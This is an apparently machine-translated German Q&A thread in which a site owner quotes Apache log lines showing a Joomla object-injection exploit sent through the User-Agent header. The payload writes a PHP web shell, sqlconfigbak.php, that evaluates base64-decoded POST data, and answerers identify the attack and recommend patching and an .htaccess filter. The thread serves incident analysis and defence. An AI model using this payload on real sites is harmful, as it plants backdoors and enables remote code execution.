Wurde die Benutzeragentenidentifikation für eine Skriptangriffstechnik verwendet?

10

Apache-Zugriffsprotokolleinträge auf meiner Site sind normalerweise wie folgt:

207.46.13.174 - - [31 / Okt / 2016: 10: 18: 55 +0100] "GET / contact HTTP / 1.1" 200 256 "-" "Mozilla / 5.0 (kompatibel; bingbot / 2.0; + http: // www .bing.com / bingbot.htm) "0.607 MISS 10.10.36.125:104 0.607

So können Sie dort das User-Agent-Feld sehen. Aber heute habe ich auch ein User-Agent-Feld gefunden, das so verwendet wird:

62.210.162.42 - - [31 / Oct / 2016: 11: 24: 19 +0100] GET / HTTP / 1.1 200 399 -} __ test | O: 21: JDatabaseDriverMysqli: 3: {s: 2 : "fc"; O: 17: "JSimplepieFactory": 0: {} s: 21: "\ 0 \ 0 \ 0disconnectHandlers"; a: 1: {i: 0; a: 2: {i: 0; O: 9: "SimplePie": 5: {s: 8: "sanitize"; O: 20: "JDatabaseDriverMysql": 0: {} s: 8: "feed_url"; s: 242: "file_put_contents ($ _ SERVER [" DOCUMENT_ROOT " ] .chr (47). "sqlconfigbak.php", "| = | \ x3C" .chr (63). "php \ x24mujj = \ x24_POST ['z']; if (\ x24mujj! = '') {\ x24xsser = base64_decode (\ x24_POST ['z0']); @ eval (\ "\\\ x24safedg = \ x24xsser; \");} "); JFactory :: getConfig (); exit;"; s: 19: " cache_name_function "; s: 6:" assert "; s: 5:" cache "; b: 1; s: 11:" cache_class "; O: 20:"JDatabaseDriverMysql ": 0: {}} i: 1; s: 4:" init ";}} s: 13:" \ 0 \ 0 \ 0connection "; b: 1;} ~ Ů" 0.304 BYPASS 10.10.36.125:104 0,304

War das ein Angriff? Der nächste Protokolleintrag scheint die sqlconfigbak.phpim Skript erwähnte Datei (Code 200) erfolgreich abgerufen zu haben . Obwohl ich die Datei im Dateisystem nicht finden kann:

62.210.162.42 - - [31 / Oct / 2016: 11: 24: 20 +0100] "GET //sqlconfigbak.php HTTP / 1.1" 200 399 "http://www.googlebot.com/bot.html" "Mozilla /5.0 (kompatibel; Googlebot / 2.1; + http: //www.google.com/bot.html) "0.244 BYPASS 10.10.36.125:104 0.244

Bitte, was war hier los?

miroxlav
quelle

Antworten:

11

Dies ist ein Joomla 0-Tage-Angriff. Informationen finden Sie hier: https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html

Dies ist trotz des __tests kein Schwachstellentest. Es ist ein Angriff.

Stellen Sie sicher, dass alle Joomla-Installationen so aktuell wie möglich sind.

Eine andere Möglichkeit besteht darin, einfach .htaccess zu verwenden, um diesen Exploit abzufangen, indem Sie nach einer gemeinsamen Zeichenfolge suchen. "__Test" würde funktionieren und an einen anderen Ort umleiten.

Schranknoc
quelle
4

Die von Ihnen verknüpfte IP-Adresse wird nicht in einen Google-Hostnamen aufgelöst, daher handelt es sich nicht um Google. Die Person oder der Bot durchsucht Ihre Site nach Schwachstellen. Der erste versucht, eine Joomla-Sicherheitslücke zu finden.

Diese Ereignisse treten auf den meisten Websites regelmäßig auf. Sie sollten sicherstellen, dass Sie die Best Practices befolgen und Ihre Website härten. Der Prozess ist lang und Sie müssen ein Online-Tutorial finden und befolgen.

Simon Hayter
quelle
OK danke. Ich habe die Website bereits gehärtet, bevor ich sie gefunden habe. Ehrlich gesagt hat mich das Finden eines solchen Angriffsvektors ein wenig überrascht.
Miroxlav
2

Beachten Sie zusätzlich zu anderen Antworten, dass die Tatsache, dass dieser Angriff anscheinend funktioniert hat, darauf hindeutet, dass Sie eine alte, unsichere Version von PHP ausführen. Ein Fix für den Fehler, den dieser Angriff ausnutzt, wurde im September 2015 veröffentlicht. Führen Sie Ihren Update-Prozess aus und stellen Sie sicher, dass die neueste Version von PHP verwendet wird. Suchen Sie auch nach anderen veralteten Programmen, die ebenfalls mit dem Internet verbunden sind, da Ihr Server anscheinend seit mindestens einem Jahr nicht mehr auf dem neuesten Stand ist.

Periata Breatta
quelle
Verdammt guter Punkt!
Closetnoc